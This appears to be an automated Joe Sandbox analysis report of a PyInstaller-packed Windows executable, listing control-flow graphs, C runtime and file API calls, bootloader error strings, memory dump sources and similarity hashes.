                                                                                                                                                                                                                                control_flow_graph 479 7ff6aae45c00-7ff6aae45c3b call 7ff6aae45588 call 7ff6aae45590 call 7ff6aae455f8 486 7ff6aae45c41-7ff6aae45c4c call 7ff6aae45598 479->486 487 7ff6aae45e65-7ff6aae45eb1 call 7ff6aae3a900 call 7ff6aae45588 call 7ff6aae45590 call 7ff6aae455f8 479->487 486->487 492 7ff6aae45c52-7ff6aae45c5c 486->492 513 7ff6aae45eb7-7ff6aae45ec2 call 7ff6aae45598 487->513 514 7ff6aae45fef-7ff6aae4605d call 7ff6aae3a900 call 7ff6aae41578 487->514 494 7ff6aae45c7e-7ff6aae45c82 492->494 495 7ff6aae45c5e-7ff6aae45c61 492->495 499 7ff6aae45c85-7ff6aae45c8d 494->499 498 7ff6aae45c64-7ff6aae45c6f 495->498 502 7ff6aae45c7a-7ff6aae45c7c 498->502 503 7ff6aae45c71-7ff6aae45c78 498->503 499->499 500 7ff6aae45c8f-7ff6aae45ca2 call 7ff6aae3d5fc 499->500 509 7ff6aae45cba-7ff6aae45cc6 call 7ff6aae3a948 500->509 510 7ff6aae45ca4-7ff6aae45ca6 call 7ff6aae3a948 500->510 502->494 506 7ff6aae45cab-7ff6aae45cb9 502->506 503->498 503->502 520 7ff6aae45ccd-7ff6aae45cd5 509->520 510->506 513->514 522 7ff6aae45ec8-7ff6aae45ed3 call 7ff6aae455c8 513->522 533 7ff6aae4606b-7ff6aae4606e 514->533 534 7ff6aae4605f-7ff6aae46066 514->534 520->520 523 7ff6aae45cd7-7ff6aae45ce8 call 7ff6aae40474 520->523 522->514 531 7ff6aae45ed9-7ff6aae45efc call 7ff6aae3a948 GetTimeZoneInformation 522->531 523->487 532 7ff6aae45cee-7ff6aae45d44 call 7ff6aae4a4d0 * 4 call 7ff6aae45b1c 523->532 550 7ff6aae45fc4-7ff6aae45fee call 7ff6aae45580 call 7ff6aae45570 call 7ff6aae45578 531->550 551 7ff6aae45f02-7ff6aae45f23 531->551 591 7ff6aae45d46-7ff6aae45d4a 532->591 536 7ff6aae46070 533->536 537 7ff6aae460a5-7ff6aae460b8 call 7ff6aae3d5fc 533->537 535 7ff6aae460fb-7ff6aae460fe 534->535 540 7ff6aae46073 535->540 541 7ff6aae46104-7ff6aae4610c call 7ff6aae45c00 535->541 536->540 556 7ff6aae460ba 537->556 557 7ff6aae460c3-7ff6aae460de call 7ff6aae41578 537->557 546 7ff6aae46078-7ff6aae460a4 call 7ff6aae3a948 call 7ff6aae2c550 540->546 547 7ff6aae46073 call 7ff6aae45e7c 540->547 541->546 547->546 558 7ff6aae45f2e-7ff6aae45f35 551->558 559 7ff6aae45f25-7ff6aae45f2b 551->559 566 7ff6aae460bc-7ff6aae460c1 call 7ff6aae3a948 556->566 577 7ff6aae460e0-7ff6aae460e3 557->577 578 7ff6aae460e5-7ff6aae460f7 call 7ff6aae3a948 557->578 560 7ff6aae45f49 558->560 561 7ff6aae45f37-7ff6aae45f3f 558->561 559->558 571 7ff6aae45f4b-7ff6aae45fbf call 7ff6aae4a4d0 * 4 call 7ff6aae42b5c call 7ff6aae46114 * 2 560->571 561->560 567 7ff6aae45f41-7ff6aae45f47 561->567 566->536 567->571 571->550 577->566 578->535 593 7ff6aae45d4c 591->593 594 7ff6aae45d50-7ff6aae45d54 591->594 593->594 594->591 596 7ff6aae45d56-7ff6aae45d7b call 7ff6aae36b58 594->596 602 7ff6aae45d7e-7ff6aae45d82 596->602 604 7ff6aae45d91-7ff6aae45d95 602->604 605 7ff6aae45d84-7ff6aae45d8f 602->605 604->602 605->604 607 7ff6aae45d97-7ff6aae45d9b 605->607 610 7ff6aae45d9d-7ff6aae45dc5 call 7ff6aae36b58 607->610 611 7ff6aae45e1c-7ff6aae45e20 607->611 619 7ff6aae45dc7 610->619 620 7ff6aae45de3-7ff6aae45de7 610->620 612 7ff6aae45e27-7ff6aae45e34 611->612 613 7ff6aae45e22-7ff6aae45e24 611->613 615 7ff6aae45e36-7ff6aae45e4c call 7ff6aae45b1c 612->615 616 7ff6aae45e4f-7ff6aae45e5e call 7ff6aae45580 call 7ff6aae45570 612->616 613->612 615->616 616->487 623 7ff6aae45dca-7ff6aae45dd1 619->623 620->611 625 7ff6aae45de9-7ff6aae45e07 call 7ff6aae36b58 620->625 623->620 626 7ff6aae45dd3-7ff6aae45de1 623->626 631 7ff6aae45e13-7ff6aae45e1a 625->631 626->620 626->623 631->611 632 7ff6aae45e09-7ff6aae45e0d 631->632 632->611 633 7ff6aae45e0f 632->633 633->631
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45C45
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE45598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE455AC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: GetLastError.KERNEL32(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A968
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6AAE3A8DF,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3A909
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6AAE3A8DF,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3A92E
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45C34
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE455F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE4560C
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45EAA
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45EBB
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45ECC
                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAE4610C), ref: 00007FF6AAE45EF3
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                • Instruction ID: a1c98466fc7462281b1a2e06b7e834d1e975dc445caaf0ddad56cf3300611eb8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CD1AE32A0A242C7E720BF26D8411B96765FF84794F44807BEA4DC7B95DF3EE842A750

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 693 7ff6aae46964-7ff6aae469d7 call 7ff6aae46698 696 7ff6aae469d9-7ff6aae469e2 call 7ff6aae34ee8 693->696 697 7ff6aae469f1-7ff6aae469fb call 7ff6aae38520 693->697 702 7ff6aae469e5-7ff6aae469ec call 7ff6aae34f08 696->702 703 7ff6aae46a16-7ff6aae46a7f CreateFileW 697->703 704 7ff6aae469fd-7ff6aae46a14 call 7ff6aae34ee8 call 7ff6aae34f08 697->704 720 7ff6aae46d32-7ff6aae46d52 702->720 706 7ff6aae46afc-7ff6aae46b07 GetFileType 703->706 707 7ff6aae46a81-7ff6aae46a87 703->707 704->702 713 7ff6aae46b09-7ff6aae46b44 GetLastError call 7ff6aae34e7c CloseHandle 706->713 714 7ff6aae46b5a-7ff6aae46b61 706->714 710 7ff6aae46ac9-7ff6aae46af7 GetLastError call 7ff6aae34e7c 707->710 711 7ff6aae46a89-7ff6aae46a8d 707->711 710->702 711->710 718 7ff6aae46a8f-7ff6aae46ac7 CreateFileW 711->718 713->702 728 7ff6aae46b4a-7ff6aae46b55 call 7ff6aae34f08 713->728 716 7ff6aae46b69-7ff6aae46b6c 714->716 717 7ff6aae46b63-7ff6aae46b67 714->717 723 7ff6aae46b72-7ff6aae46bc7 call 7ff6aae38438 716->723 724 7ff6aae46b6e 716->724 717->723 718->706 718->710 732 7ff6aae46bc9-7ff6aae46bd5 call 7ff6aae468a0 723->732 733 7ff6aae46be6-7ff6aae46c17 call 7ff6aae46418 723->733 724->723 728->702 732->733 740 7ff6aae46bd7 732->740 738 7ff6aae46c19-7ff6aae46c1b 733->738 739 7ff6aae46c1d-7ff6aae46c5f 733->739 741 7ff6aae46bd9-7ff6aae46be1 call 7ff6aae3aac0 738->741 742 7ff6aae46c81-7ff6aae46c8c 739->742 743 7ff6aae46c61-7ff6aae46c65 739->743 740->741 741->720 745 7ff6aae46d30 742->745 746 7ff6aae46c92-7ff6aae46c96 742->746 743->742 744 7ff6aae46c67-7ff6aae46c7c 743->744 744->742 745->720 746->745 748 7ff6aae46c9c-7ff6aae46ce1 CloseHandle CreateFileW 746->748 750 7ff6aae46d16-7ff6aae46d2b 748->750 751 7ff6aae46ce3-7ff6aae46d11 GetLastError call 7ff6aae34e7c call 7ff6aae38660 748->751 750->745 751->750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                • Instruction ID: e22a441afecb09796a032c7834d33beea07954e64edb72f4c3310340a0f3e353
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CC1DF32B29A41C6EB10EF69C4902AC7765FB49B98F014276DE5E9B7E4CF39E452D300

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1114 7ff6aae45e7c-7ff6aae45eb1 call 7ff6aae45588 call 7ff6aae45590 call 7ff6aae455f8 1121 7ff6aae45eb7-7ff6aae45ec2 call 7ff6aae45598 1114->1121 1122 7ff6aae45fef-7ff6aae4605d call 7ff6aae3a900 call 7ff6aae41578 1114->1122 1121->1122 1127 7ff6aae45ec8-7ff6aae45ed3 call 7ff6aae455c8 1121->1127 1134 7ff6aae4606b-7ff6aae4606e 1122->1134 1135 7ff6aae4605f-7ff6aae46066 1122->1135 1127->1122 1133 7ff6aae45ed9-7ff6aae45efc call 7ff6aae3a948 GetTimeZoneInformation 1127->1133 1148 7ff6aae45fc4-7ff6aae45fee call 7ff6aae45580 call 7ff6aae45570 call 7ff6aae45578 1133->1148 1149 7ff6aae45f02-7ff6aae45f23 1133->1149 1137 7ff6aae46070 1134->1137 1138 7ff6aae460a5-7ff6aae460b8 call 7ff6aae3d5fc 1134->1138 1136 7ff6aae460fb-7ff6aae460fe 1135->1136 1140 7ff6aae46073 1136->1140 1141 7ff6aae46104-7ff6aae4610c call 7ff6aae45c00 1136->1141 1137->1140 1153 7ff6aae460ba 1138->1153 1154 7ff6aae460c3-7ff6aae460de call 7ff6aae41578 1138->1154 1144 7ff6aae46078-7ff6aae460a4 call 7ff6aae3a948 call 7ff6aae2c550 1140->1144 1145 7ff6aae46073 call 7ff6aae45e7c 1140->1145 1141->1144 1145->1144 1155 7ff6aae45f2e-7ff6aae45f35 1149->1155 1156 7ff6aae45f25-7ff6aae45f2b 1149->1156 1162 7ff6aae460bc-7ff6aae460c1 call 7ff6aae3a948 1153->1162 1171 7ff6aae460e0-7ff6aae460e3 1154->1171 1172 7ff6aae460e5-7ff6aae460f7 call 7ff6aae3a948 1154->1172 1157 7ff6aae45f49 1155->1157 1158 7ff6aae45f37-7ff6aae45f3f 1155->1158 1156->1155 1166 7ff6aae45f4b-7ff6aae45fbf call 7ff6aae4a4d0 * 4 call 7ff6aae42b5c call 7ff6aae46114 * 2 1157->1166 1158->1157 1163 7ff6aae45f41-7ff6aae45f47 1158->1163 1162->1137 1163->1166 1166->1148 1171->1162 1172->1136
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45EAA
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE455F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE4560C
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45EBB
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE45598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE455AC
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45ECC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE455C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE455DC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: GetLastError.KERNEL32(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A968
                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAE4610C), ref: 00007FF6AAE45EF3
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                • Instruction ID: 8fe8c31a1f3389ddb5f35f65fc64620cb6adbcf87ef4d020c627ec303954c98e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF51B432A09682C7E720FF25E8811B96764FB48784F4045BBEA5DC3795DF3EE842A750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                • Instruction ID: cada24142b017985374201d36ff8de6408adedd1756f44b18589657d24552d4b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBF0C832A1A742C6FB609F64B4987667390BB84364F041376D9AD426D4DF3CE44EDA00

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 331 7ff6aae21950-7ff6aae2198b call 7ff6aae245c0 334 7ff6aae21c4e-7ff6aae21c72 call 7ff6aae2c550 331->334 335 7ff6aae21991-7ff6aae219d1 call 7ff6aae27f90 331->335 340 7ff6aae219d7-7ff6aae219e7 call 7ff6aae306d4 335->340 341 7ff6aae21c3b-7ff6aae21c3e call 7ff6aae3004c 335->341 346 7ff6aae219e9-7ff6aae21a03 call 7ff6aae34f08 call 7ff6aae22910 340->346 347 7ff6aae21a08-7ff6aae21a24 call 7ff6aae3039c 340->347 345 7ff6aae21c43-7ff6aae21c4b 341->345 345->334 346->341 353 7ff6aae21a26-7ff6aae21a40 call 7ff6aae34f08 call 7ff6aae22910 347->353 354 7ff6aae21a45-7ff6aae21a5a call 7ff6aae34f28 347->354 353->341 361 7ff6aae21a7b-7ff6aae21b05 call 7ff6aae21c80 * 2 call 7ff6aae306d4 call 7ff6aae34f44 354->361 362 7ff6aae21a5c-7ff6aae21a76 call 7ff6aae34f08 call 7ff6aae22910 354->362 375 7ff6aae21b0a-7ff6aae21b14 361->375 362->341 376 7ff6aae21b16-7ff6aae21b30 call 7ff6aae34f08 call 7ff6aae22910 375->376 377 7ff6aae21b35-7ff6aae21b4e call 7ff6aae3039c 375->377 376->341 383 7ff6aae21b6f-7ff6aae21b8b call 7ff6aae30110 377->383 384 7ff6aae21b50-7ff6aae21b6a call 7ff6aae34f08 call 7ff6aae22910 377->384 390 7ff6aae21b8d-7ff6aae21b99 call 7ff6aae22710 383->390 391 7ff6aae21b9e-7ff6aae21bac 383->391 384->341 390->341 391->341 395 7ff6aae21bb2-7ff6aae21bb9 391->395 397 7ff6aae21bc1-7ff6aae21bc7 395->397 398 7ff6aae21bc9-7ff6aae21bd6 397->398 399 7ff6aae21be0-7ff6aae21bef 397->399 400 7ff6aae21bf1-7ff6aae21bfa 398->400 399->399 399->400 401 7ff6aae21bfc-7ff6aae21bff 400->401 402 7ff6aae21c0f 400->402 401->402 404 7ff6aae21c01-7ff6aae21c04 401->404 403 7ff6aae21c11-7ff6aae21c24 402->403 405 7ff6aae21c26 403->405 406 7ff6aae21c2d-7ff6aae21c39 403->406 404->402 407 7ff6aae21c06-7ff6aae21c09 404->407 405->406 406->341 406->397 407->402 408 7ff6aae21c0b-7ff6aae21c0d 407->408 408->403
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE27F90: _fread_nolock.LIBCMT ref: 00007FF6AAE2803A
                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF6AAE21A1B
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6AAE21B6A), ref: 00007FF6AAE2295E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                • Opcode ID: 70c875ae13451ebc6921e11026a808857521fb963ce313c5eb273bd5d0283093
                                                                                                                                                                                                                                • Instruction ID: af9e67d23f1b57bceb91ad9297cccecb1b99c3d2377079c4ac158f1b1c20cbf0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70c875ae13451ebc6921e11026a808857521fb963ce313c5eb273bd5d0283093
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC819071A0A687C6EB64FF24D0412B963A0BF88784F4444B3D98DC7795DE3CE68BA750

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 409 7ff6aae21600-7ff6aae21611 410 7ff6aae21637-7ff6aae21651 call 7ff6aae245c0 409->410 411 7ff6aae21613-7ff6aae2161c call 7ff6aae21050 409->411 416 7ff6aae21653-7ff6aae21681 call 7ff6aae34f08 call 7ff6aae22910 410->416 417 7ff6aae21682-7ff6aae2169c call 7ff6aae245c0 410->417 418 7ff6aae2162e-7ff6aae21636 411->418 419 7ff6aae2161e-7ff6aae21629 call 7ff6aae22710 411->419 426 7ff6aae216b8-7ff6aae216cf call 7ff6aae306d4 417->426 427 7ff6aae2169e-7ff6aae216b3 call 7ff6aae22710 417->427 419->418 433 7ff6aae216f9-7ff6aae216fd 426->433 434 7ff6aae216d1-7ff6aae216f4 call 7ff6aae34f08 call 7ff6aae22910 426->434 435 7ff6aae21821-7ff6aae21824 call 7ff6aae3004c 427->435 437 7ff6aae21717-7ff6aae21737 call 7ff6aae34f44 433->437 438 7ff6aae216ff-7ff6aae2170b call 7ff6aae21210 433->438 448 7ff6aae21819-7ff6aae2181c call 7ff6aae3004c 434->448 443 7ff6aae21829-7ff6aae2183b 435->443 449 7ff6aae21739-7ff6aae2175c call 7ff6aae34f08 call 7ff6aae22910 437->449 450 7ff6aae21761-7ff6aae2176c 437->450 445 7ff6aae21710-7ff6aae21712 438->445 445->448 448->435 463 7ff6aae2180f-7ff6aae21814 449->463 451 7ff6aae21802-7ff6aae2180a call 7ff6aae34f30 450->451 452 7ff6aae21772-7ff6aae21777 450->452 451->463 456 7ff6aae21780-7ff6aae217a2 call 7ff6aae3039c 452->456 464 7ff6aae217da-7ff6aae217e6 call 7ff6aae34f08 456->464 465 7ff6aae217a4-7ff6aae217bc call 7ff6aae30adc 456->465 463->448 470 7ff6aae217ed-7ff6aae217f8 call 7ff6aae22910 464->470 471 7ff6aae217be-7ff6aae217c1 465->471 472 7ff6aae217c5-7ff6aae217d8 call 7ff6aae34f08 465->472 477 7ff6aae217fd 470->477 471->456 474 7ff6aae217c3 471->474 472->470 474->477 477->451
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
